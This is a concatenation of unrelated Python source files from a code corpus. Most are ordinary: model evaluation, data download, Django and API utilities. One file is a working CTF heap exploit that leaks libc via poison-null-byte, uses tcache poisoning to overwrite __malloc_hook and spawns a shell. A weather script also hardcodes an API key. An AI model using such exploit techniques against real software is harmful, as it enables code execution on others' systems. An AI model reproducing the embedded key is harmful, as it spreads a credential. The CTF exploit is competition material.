output_model_file = os.path.join(args.output_dir, "pytorch_model.bin")
# Load a trained model that you have fine-tuned
ptr_model = torch.load(output_model_file, map_location=device)
del_list = []
for key in ptr_model.keys():
if ('slot' in key) or ('value' in key):
del_list.append(key)
for key in del_list:
del ptr_model[key]
if n_gpu > 1:
model = model.module
state = model.state_dict()
state.update(ptr_model)
model.load_state_dict(state)
model.to(device)
## Get slot-value embeddings
label_token_ids, label_len = [], []
for labels in label_list:
token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
label_token_ids.append(token_ids)
label_len.append(lens)
## Get slot-type embeddings
## Note: slot embeddings are ordered as [previous slots + present target slots]
slot_token_ids, slot_len = \
get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)
model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \
= all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)
logger.info("***** Running evaluation *****")
logger.info(" Num examples = %d", len(eval_examples))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
# Run prediction for full data
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)
model.eval()
eval_loss, eval_accuracy = 0, 0
eval_loss_slot, eval_acc_slot = None, None
nb_eval_steps, nb_eval_examples = 0, 0
prev_eval_loss, prev_eval_accuracy = 0, 0
prev_eval_loss_slot, prev_eval_acc_slot = None, None
nb_eval_examples_prev = 0
for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc="Evaluating"):
if input_ids.dim() == 2:
input_ids = input_ids.unsqueeze(0)
input_len = input_len.unsqueeze(0)
label_ids = label_ids.unsuqeeze(0)
prev_label_ids = prev_label_ids.unsuqeeze(0)
with torch.no_grad():
if n_gpu == 1:
loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
else:
loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
loss = loss.mean()
acc = acc.mean()
acc_slot = acc_slot.mean(0)
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
prev_loss = prev_loss.mean()
prev_acc = prev_acc.mean()
prev_acc_slot = prev_acc_slot.mean(0)
nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item()
nb_eval_examples_prev += nb_eval_ex_prev
nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item()
nb_eval_examples += nb_eval_ex
nb_eval_steps += 1
def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex):
eval_loss += loss.item() * nb_eval_ex
eval_accuracy += acc.item() * nb_eval_ex
if loss_slot is not None:
if eval_loss_slot is None:
eval_loss_slot = [ l * nb_eval_ex for l in loss_slot]
else:
for i, l in enumerate(loss_slot):
eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex
if eval_acc_slot is None:
eval_acc_slot = acc_slot * nb_eval_ex
else:
eval_acc_slot += acc_slot * nb_eval_ex
return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot
eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \
_post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex)
prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \
_post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev)
eval_loss /= nb_eval_examples
if eval_loss_slot is None: # for multi-gpu
eval_loss_slot = [0]
prev_eval_loss_slot = [0]
eval_accuracy = eval_accuracy / nb_eval_examples
prev_eval_loss = prev_eval_loss / nb_eval_examples_prev
prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev
eval_acc_slot = eval_acc_slot / nb_eval_examples
prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev
total_acc_slot = {}
for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)):
total_acc_slot[idx] = val
total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0))
loss = tr_loss / nb_tr_steps if args.do_train else None
result = {'eval_loss': eval_loss,
'eval_accuracy': eval_accuracy,
'loss': loss,
'eval_loss_slot':'\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]),
'eval_acc_slot':'\t'.join([ str((val).item()) for val in eval_acc_slot]),
'prev_eval_loss': prev_eval_loss,
'prev_eval_accuracy': prev_eval_accuracy,
'prev_eval_loss_slot': '\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]),
'prev_eval_acc_slot': '\t'.join([str((val).item()) for val in prev_eval_acc_slot]),
'total_acc_slot': '\t'.join([str(val[1].item()) for val in total_acc_slot])
}
out_file_name = 'eval_results'
if args.target_slot=='all':
out_file_name += '_all'
output_eval_file = os.path.join(args.output_dir, "%s.txt" % out_file_name)
with open(output_eval_file, "w") as writer:
logger.info("***** Eval results *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
###############################################################################
# Analyze: TODO
###############################################################################
if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0):
pdb.set_trace()
def draw(data, x, y, ax):
seaborn.heatmap(data,
xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0,
cbar=False, ax=ax)
class_correct = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]
class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]
eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)
all_input_ids, all_input_len, all_label_ids = convert_examples_to_features(
eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length)
all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to(
device), all_label_ids.to(device)
logger.info("***** Running analysis *****")
logger.info(" Num examples = %d", len(eval_examples))
logger.info(" Batch size = %d", 1)
eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids)
# Run prediction for full data
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1)
model.eval()
none_value_id = [ len(val)-1 for val in label_list]
incorrect_dialogs = []
attention_draw = 5
for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc="Evaluating"):
if input_ids.dim() == 2:
input_ids = input_ids.unsqueeze(0)
input_len = input_len.unsqueeze(0)
label_ids = label_ids.unsuqeeze(0)
with torch.no_grad():
_, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1)
nturn = (label_ids[:,:,0].view(-1) != -1).sum().item()
nslot = label_ids.size(2)
for slot in range(nslot):
for turn in range(nturn):
class_count[slot][label_ids[0][turn][slot]]+=1
if label_ids[0][turn][slot] == pred_slot[0][turn][slot]:
class_correct[slot][label_ids[0][turn][slot]] +=1
drawfig = False
print('hotel')
print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))
print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))
print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1))
print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1))
pdb.set_trace()
if drawfig == True:
#if (len(incorrect_dialogs) < attention_draw):
max_len = input_ids.size(2)
attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len)
for slot in range(0, nslot):
fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn))
print("Slot", slot)
for turn in range(nturn):
draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(),
tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()),
[*range(0, args.attn_head)], ax=axs[turn])
axs[turn].set_title("turn %d slot: %s label: %s pred: %s"
% (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]),
str(label_list[slot][pred_slot[0][turn][slot].item()]) ))
plt.show()
plt.savefig(os.path.join(args.output_dir, "attention-d%d-slot%s.png"%(len(incorrect_dialogs), slot)))
plt.close()
if not acc == 1:
dialog = []
for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]):
if label[0] == -1:
break
text = {}
text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '')
text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())]
text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())]
dialog.append(text)
incorrect_dialogs.append(dialog)
output_eval_incorr_file = os.path.join(args.output_dir, "incorrect_dialog.txt")
with open(output_eval_incorr_file, "w") as writer:
for dialog in incorrect_dialogs:
for turn in dialog:
text = turn['input'] + '\t'
for label, pred in zip(turn['label'], turn['pred']):
text += '%s\t%s\t'%(label, pred)
writer.write("%s\n" % text)
writer.write("---------- \n")
logger.info("Done analysis: %s" % output_eval_incorr_file)
output_eval_incorr_file = os.path.join(args.output_dir, "per_class_accuracy.txt")
with open(output_eval_incorr_file, "w") as writer:
total_class_acc = 0
total_slot_class_acc = []
nlabels = 0
for sid, slot in enumerate(class_count):
slot_class_acc = 0
for vid, value in enumerate(slot):
if not value == 0:
class_acc = class_correct[sid][vid]/value
writer.write("%s\t%d\t%d\t%.3f\n"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) )
slot_class_acc += class_acc
nlabels += 1
else:
writer.write("%s\t%d\t%d\t%.3f\n"%(label_list[sid][vid], class_correct[sid][vid], value, -1) )
total_slot_class_acc.append(slot_class_acc/(vid+1))
total_class_acc+=slot_class_acc
total_class_acc /= nlabels
for sid, slot_acc in enumerate(total_slot_class_acc):
writer.write("%d\t%.3f\n" % (sid, slot_acc))
writer.write("total class accuracy \t%.3f\n" % total_class_acc)
logger.info("Done analysis: %s" % output_eval_incorr_file)
print(class_correct)
print(class_count)
if __name__ == "__main__":
main() | 2.28125 | 2 |
s3-encfs-fuse.py | hirokikana/s3-encfs-fuse | 0 | 12796179 | <gh_stars>0
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from s3encfs.s3fs import S3FS
from sys import argv, exit
import logging
from fuse import FUSE
if __name__ == '__main__':
if len(argv) != 2:
print('usage: %s <mountpoint>' % argv[0])
exit(1)
logging.basicConfig(level=logging.DEBUG)
fuse = FUSE(S3FS(), argv[1], foreground=True)
| 1.914063 | 2 |
ipcrg/resources/id_mapping/download_human_gene_mapping.py | iPC-project-H2020/ipcrg | 3 | 12796180 | <filename>ipcrg/resources/id_mapping/download_human_gene_mapping.py<gh_stars>1-10
"""Download the latest NCBI id mapping for humans."""
import os
import argparse
import urllib.request
import pandas as pd
MAPPING_FTP_FILEPATH = (
'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/'
'gene2accession.gz'
)
TAX_ID = 9606
parser = argparse.ArgumentParser()
parser.add_argument(
'-o',
'--filepath',
type=str,
help='path where to store the file.',
required=True
)
if __name__ == '__main__':
# parse arguments
args = parser.parse_args()
# download the file
urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath)
# extract specific taxonomy data
mapping_df = pd.concat(
[
batch[batch.index == TAX_ID] for batch in
pd.read_csv(args.filepath, sep='\t', index_col=0, chunksize=10000)
],
sort=False
)
# delete the full file
os.remove(args.filepath)
# dump the mapping file
mapping_df.to_csv(args.filepath, sep='\t')
| 2.953125 | 3 |
openslides_backend/action/action_interface.py | reiterl/openslides-backend | 0 | 12796181 | from typing import Any, Dict, List
from mypy_extensions import TypedDict
from typing_extensions import Protocol
ActionPayload = List[Dict[str, Any]]
ActionPayloadWithLabel = TypedDict(
"ActionPayloadWithLabel", {"action": str, "data": ActionPayload}
)
Payload = List[ActionPayloadWithLabel]
ActionResult = TypedDict("ActionResult", {"success": bool, "message": str})
class Action(Protocol): # pragma: no cover
"""
Interface for action component.
The handle_request method raises ActionException or PermissionDenied if
the request fails.
"""
def handle_request(self, payload: Payload, user_id: int) -> List[ActionResult]:
...
| 2.6875 | 3 |
openmct_python_example/python-server/test.py | waltoncade/KSD_GroundSystems | 2 | 12796182 | <reponame>waltoncade/KSD_GroundSystems<gh_stars>1-10
import queue, threading, time
hist = queue.Queue()
real = queue.Queue()
def putData():
histStart = 0
realStart = 0
while True:
time.sleep(1)
hist.put(histStart)
real.put(realStart)
histStart = histStart - 1
realStart = realStart + 1
def getHist():
while True:
while not hist.empty():
print(hist.get())
def getReal():
while True:
while not real.empty():
print(real.get())
if __name__ == "__main__":
threading.Thread(target=putData).start()
threading.Thread(target=getHist).start()
threading.Thread(target=getReal).start()
while True:
pass | 2.6875 | 3 |
aerolyzer/wunderData.py | Aerolyzer/Aerolyzer | 9 | 12796183 | <gh_stars>1-10
import urllib2
import json
import sys
import os
#def get_wunderkey()
def get_data(coord):
'''
Purpose: The purpose of this script is to retrieve meteorological data
of a given comma-separated latitude and longitute coordinates via the
wunderground API.
Inputs: coord: string representing comma-separated coordinates.
Outputs: weatherData: tuple of city, country, temp in F, sunrise time, sunset time.
Returns: dictionary with 5 keys.
Assumptions: The wunderground API key is valid.
'''
name = coord + '.json'
try:
f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name)
m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name)
conditions = f.read()
parsedConditions = json.loads(conditions)
astronomy = m.read()
parsedAstronomy = json.loads(astronomy)
city = parsedConditions['location']['city']
country = parsedConditions['location']['country']
temp = parsedConditions['current_observation']['temp_f']
sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute']
sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour']
sunrise = sunriseHr + ":" + sunriseMin
sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute']
sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour']
sunset = sunsetHr + ":" + sunsetMin
weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset}
except Exception:
print ("Unable to retrieve data: ", sys.exc_info()[0])
weatherData = None
finally:
return weatherData
| 3.625 | 4 |
reader.py | pianomania/cifar10 | 2 | 12796184 | import numpy as np
import os
import re
import cPickle
class read_cifar10(object):
def __init__(self, data_path=None, is_training=True):
self.data_path = data_path
self.is_training = is_training
def load_data(self):
files = os.listdir(self.data_path)
if self.is_training is True:
pattern = re.compile('(data_batch_).')
to_read = [m.group(0) for i in files for m in [pattern.search(i)] if m]
data = []
labels = []
for t in to_read:
with open(self.data_path+'/'+t, 'rb') as f:
d = cPickle.load(f)
data.append(d['data'])
labels.append(d['labels'])
data = np.vstack(data)
labels = np.hstack(labels)
else:
with open(self.data_path+'/test_batch') as f:
d = cPickle.load(f)
data = d['data']
labels = d['labels']
return data, labels
| 2.390625 | 2 |
things_cli/__init__.py | thingsapi/things-cli | 49 | 12796185 | <gh_stars>10-100
"""A simple Python 3 CLI to read your Things app data."""
__author__ = "<NAME>"
__copyright__ = "2021 <NAME>"
__credits__ = ["<NAME>"]
__license__ = "Apache License 2.0"
__version__ = "0.1.2"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
| 1.375 | 1 |
packages/core/minos-microservice-networks/minos/networks/brokers/handlers/__init__.py | bhardwajRahul/minos-python | 247 | 12796186 | from .impl import (
BrokerHandler,
)
from .ports import (
BrokerHandlerService,
BrokerPort,
)
| 1.148438 | 1 |
combinatorics.py | GoaPhuDen/algorithms-in-python | 100 | 12796187 | """ Various combinatorics functions. """
__author__ = "<NAME>"
__date__ = "2015-02-20"
def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n-1)
def permutations(lst):
result = []
def permute(current, rest):
if rest == []:
result.append(current)
return
for r in rest:
permute(current + (r,), [i for i in rest if i != r])
permute((), lst)
return result
def subsets(lst):
result = []
def _subsets(current, rest):
if rest == []:
result.append(current)
return
(first, *rest) = rest
_subsets(current + (first,), rest)
_subsets(current, rest)
_subsets((), lst)
return result
if __name__ == "__main__":
print("Permutations of ['a','b','c']:", permutations(['a','b','c']))
print("Subsets of ['a','b','c']:", subsets(['a','b','c']))
| 4.03125 | 4 |
sqliscan/lib/reporter.py | Marzooq13579/Hack-Gadgets | 8 | 12796188 | <reponame>Marzooq13579/Hack-Gadgets
from lib.colour import colours
class Report:
def __init__(self, msg, result=False):
"""
Handles the message and report it back to console
:param msg : String type message
:param result : the boolean object indicating if the url is vulnerable
"""
if result:
print("{}{}{}".format(colours.FAIL, msg, colours.ENDC))
else:
print(msg)
| 3.03125 | 3 |
assessment/migrations/0008_auto_20190125_1249.py | kenware/Assessment | 0 | 12796189 | # Generated by Django 2.1.4 on 2019-01-25 12:49
import datetime
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assessment', '0007_answer_is_correct_choice'),
]
operations = [
migrations.RemoveField(
model_name='question',
name='correct_choices',
),
migrations.AddField(
model_name='assessment',
name='multi_times',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='score',
name='history',
field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
),
migrations.AlterField(
model_name='answer',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='assessment',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='question',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='question',
name='mark',
field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),
),
migrations.AlterField(
model_name='score',
name='assessment_score',
field=models.DecimalField(decimal_places=10, default=0.0, max_digits=19),
),
migrations.AlterField(
model_name='score',
name='created_at',
field=models.DateField(default=datetime.date(2019, 1, 25)),
),
migrations.AlterField(
model_name='score',
name='status',
field=models.CharField(blank=True, default='started', max_length=250),
),
]
| 1.828125 | 2 |
scripts/plot_compartment_strength.py | Lila14/multimds | 0 | 12796190 | <filename>scripts/plot_compartment_strength.py
from matplotlib import pyplot as plt
import sys
sys.path.append("..")
import compartment_analysis as ca
import data_tools as dt
import os
paths = sys.argv[1:len(sys.argv)]
prefixes = [os.path.basename(path) for path in paths]
structs = [dt.structureFromBed(path) for path in paths]
mats = [dt.matFromBed(path, struct) for path, struct in zip(paths, structs)]
all_comps = [ca.get_compartments(mat) for mat in mats]
all_gen_coords = [struct.getGenCoords() for struct in structs]
#all_comps[len(all_comps)-1] = -all_comps[len(all_comps)-1]
for gen_coords, comps, prefix in zip(all_gen_coords, all_comps, prefixes):
plt.plot(gen_coords, comps, label=prefix)
plt.legend()
plt.show()
| 2.390625 | 2 |
tests/__init__.py | crashfrog/peewee-pymssql | 0 | 12796191 | """Unit test package for peewee_pymssql."""
| 1.132813 | 1 |
server/social_network/views.py | ctcusc/django-react-boilerplate | 5 | 12796192 | """API views for social_network."""
from rest_framework import viewsets
from rest_framework.decorators import api_view, detail_route
from rest_framework.response import Response
from rest_framework.reverse import reverse
from .models import Profile, Post, Vote
from .serializers import ProfileSerializer, PostSerializer
@api_view(['GET'])
def api_root(request, format=None):
"""Root of API, this is useful for documentation generated by DRF."""
return Response({
'profiles': reverse('profile-list', request=request, format=format),
'posts': reverse('post-list', request=request, format=format)
})
class ProfileViewSet(viewsets.ReadOnlyModelViewSet):
"""This provides get and list functionality for Profiles."""
queryset = Profile.objects.all()
serializer_class = ProfileSerializer
class PostViewSet(viewsets.ModelViewSet):
"""Get or create Posts.
retrieve:
Return a post given its ID.
list:
Get a paginated list of all Posts.
create:
Create a new Post as the logged-in user.
"""
queryset = Post.objects.all().order_by('-created')
serializer_class = PostSerializer
def perform_create(self, serializer):
"""Create a Post associated with the logged-in user."""
serializer.save(owner=self.request.user.profile)
@detail_route(methods=['POST', 'DELETE'], url_path='vote')
def vote(self, request, pk=None):
"""Vote or unvote on a post."""
post = self.get_object()
if request.method == 'POST':
# check if the vote already exists, if so don't allow the user to vote again
if Vote.objects.filter(profile=self.request.user.profile, post=post).exists():
# the user already voted, just return the post directly
data = PostSerializer(post, context={'request': self.request}).data
return Response(data)
new_vote = Vote(profile=self.request.user.profile, post=post)
new_vote.save()
elif request.method == 'DELETE':
Vote.objects.filter(profile=self.request.user.profile, post=post).delete()
data = PostSerializer(post, context={'request': self.request}).data
return Response(data)
| 2.734375 | 3 |
HITCON/2018/children_tcache/exploit.py | Per5ianCat/ctf-writeups | 476 | 12796193 | #!/usr/bin/env python
from pwn import *
def new_heap(size, data, attack=False):
p.sendlineafter('Your choice: ', '1')
p.sendlineafter('Size:', str(size))
if attack:
return
p.sendafter('Data:', data)
if len(data) < size:
p.sendline()
def show_heap(index):
p.sendlineafter('Your choice: ', '2')
p.sendlineafter('Index:', str(index))
def delete_heap(index):
p.sendlineafter('Your choice: ', '3')
p.sendlineafter('Index:', str(index))
with context.quiet:
# hitcon{l4st_rem41nd3r_1s_v3ry_us3ful}
# p = remote('192.168.127.12', 8763)
p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})
# table[0] => chunk_0 (0x511)
new_heap(0x500, 'a' * 0x4ff)
# table[1] => chunk_1 (0x71)
new_heap(0x68, 'b' * 0x67)
# table[2] => chunk_2 (0x601)
new_heap(0x5f0, 'c' * 0x5ef)
# table[3] => chunk_3 (0x31)
# this chunk is for preventing consolidation of previous
# chunks with the top chunk
new_heap(0x20, 'd' * 0x20)
# we need to delete chunk_1, so we can re-allocate it again
# in order to launch off-by-one (poison-null-byte) attack
delete_heap(1)
# chunk_0 should we freed so it can be consolidated with chunk_2 later
delete_heap(0)
# when we free a chunk, programs writes 0xDA to the whole chunk
# so, we need to zero out some parts of the chunk_1. Therefore,
# we are allocating/freeing the chunk_1 multiple times with different sizes
# interestingly, it always have chunk size of 0x71, but the program only cares
# about the input size
for i in range(9):
# table[0] => chunk_1 (0x71)
# this causes strcpy writes null byte at the end of buffer.
# when i == 0, off-by-one happens and turn size of chunk_2 from
# 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit.
new_heap(0x68 - i, 'b' * (0x68 - i))
# we need to free the chunk, so malloc returns it on the next new_heap call
delete_heap(0)
# table[0] => chunk_1 (0x71)
# this set the prev_size field of chunk_2
new_heap(0x68, 'b' * 0x60 + p64(0x580))
# when we free chunk_2, it consolidates with chunk_0
# therefore, we have a overlapping free chunk with chunk_1
# the resulting big chunk will be put in the unsorted bin
delete_heap(2)
# table[1] => chunk_4 (0x511)
# this will use the unsorted bin for allocation, and writes
# a libc address into chunk_1 fd/bk fields
new_heap(0x508, 'e' * 0x507)
# viwing chunk_1 will leak libc address
show_heap(0)
libc_addr = p.recvuntil('\n$$')[:-3]
libc_base = u64(libc_addr + '\x00' * (8 - len(libc_addr))) - 0x3ebca0
print 'libc base: {}'.format(hex(libc_base))
# table[2] => chunk_5 (0x71)
# this will allocate chunk_5 exactly in the same place as chunk_1
new_heap(0x68, 'f' * 0x67)
# we used tcache_dup attack here which is due to double free
# freeing chunk_1 and chunk_5 put them in the same bin in tcache
# even though they are pointing to the same address
delete_heap(0)
delete_heap(2)
# we can create a fake chunk before __malloc_hook with size of 0x7f
malloc_hook = libc_base + 0x3ebc30
fake_chunk = malloc_hook - 0x13
print 'fake chunk: {}'.format(hex(fake_chunk))
# table[4] => chunk_5 (0x71)
# we used tcache_poisoning here
# chunk_5 will be served from tcache and we will put the address of
# our fake chunk in the chunk_1's fd.
new_heap(0x68, p64(fake_chunk))
# table[5] => chunk_1 (0x71)
# this allocation serves chunk_1 and put fake chunk address in the tcache
new_heap(0x68, 'h' * 0x67)
'''
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
'''
# table[6] => fake_chunk (0x7f)
# since fake_chunk is at the head of the list, this allocation returns it
# then, we overwrite __malloc_hook with one gadget
new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322))
# this allocation triggers __malloc_hook and we have shell
new_heap(1, '', True)
p.interactive()
| 2.546875 | 3 |
CKButils.py | MathAI-LAB/CKB | 5 | 12796194 | <filename>CKButils.py
# -*- coding: utf-8 -*-
import torch
from torch.autograd import Variable
import sys
##################################
# Network & Variable
##################################
def weights_init(m):
"""Initialize network parameters."""
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.05)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
elif classname.find('Linear') != -1:
m.weight.data.normal_(0.0, 0.05)
m.bias.data.fill_(0)
def weights_init_kaiming(m):
classname = m.__class__.__name__
if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1:
torch.nn.init.kaiming_uniform_(m.weight)
torch.nn.init.zeros_(m.bias)
elif classname.find('BatchNorm') != -1:
torch.nn.init.normal_(m.weight, 1.0, 0.02)
torch.nn.init.zeros_(m.bias)
elif classname.find('Linear') != -1:
torch.nn.init.xavier_normal_(m.weight)
torch.nn.init.zeros_(m.bias)
def to_var(x):
"""Convert numpy to variable."""
if torch.cuda.is_available():
x = x.cuda()
return Variable(x)
def to_data(x):
"""Convert variable to numpy."""
if torch.cuda.is_available():
x = x.cpu()
return x.data.numpy()
def classification_accuracy(data_loader,DNN,FC):
with torch.no_grad():
correct = 0
for batch_idx, (X, lab) in enumerate(data_loader):
X, lab = to_var(X), to_var(lab).long().squeeze()
_, prob = FC(DNN(X))
plab = prob.data.max(1)[1]
correct += plab.eq(lab.data).cpu().sum()
accuracy = correct.item() / len(data_loader.dataset)
return accuracy
def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005):
"""Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs."""
lr = init_lr * (1 + gamma * iter_num) ** (-power)
i = 0
for param_group in optimizer.param_groups:
param_group['lr'] = lr * param_lr[i]
param_group['weight_decay'] = weight_decay * 2
i += 1
return optimizer
schedule_dict = {"inv":inv_lr_scheduler}
##################################
# Objective Functions
##################################
# Cross-Entropy Loss
NLL_loss = torch.nn.NLLLoss().cuda()
def Cross_Entropy(prob,lab):
CE_loss = NLL_loss(torch.log(prob+1e-4), lab)
return CE_loss
# Entropy Loss
def Entropy(prob):
num_sam = prob.shape[0]
Entropy = -(prob.mul(prob.log()+1e-4)).sum()
return Entropy/num_sam
# CKB loss
def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'):
# Y: label, Z: fea, matching conditional distribution P(Z|Y)
num_sam_s = fea_s.shape[0]
num_sam_t = fea_t.shape[0]
OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach()
if CKB_type == 'hard':
prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach()
elif CKB_type == 'soft':
prob_t = prob_t.detach()
else:
sys.exit('Error: invalid CKB_type')
I_s = torch.eye(num_sam_s).cuda()
I_t = torch.eye(num_sam_t).cuda()
#====== Kernel Matrix and Centering Matrix =======
H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda()
H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda()
D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\
2*torch.mm(OneHot_s,OneHot_s.t())
D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\
prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(prob_t,prob_t.t())
D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\
2*torch.mm(fea_s,fea_s.t())
D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\
fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(fea_t,fea_t.t())
D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\
fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\
2*torch.mm(fea_t,fea_s.t())
sigma_YsYs = D_YsYs.mean().detach()
sigma_YtYt = D_YtYt.mean().detach()
sigma_ZsZs = D_ZsZs.mean().detach()
sigma_ZtZt = D_ZtZt.mean().detach()
sigma_ZtZs = D_ZtZs.mean().detach()
K_YsYs = (-D_YsYs/sigma_YsYs).exp()
K_YtYt = (-D_YtYt/sigma_YtYt).exp()
K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp()
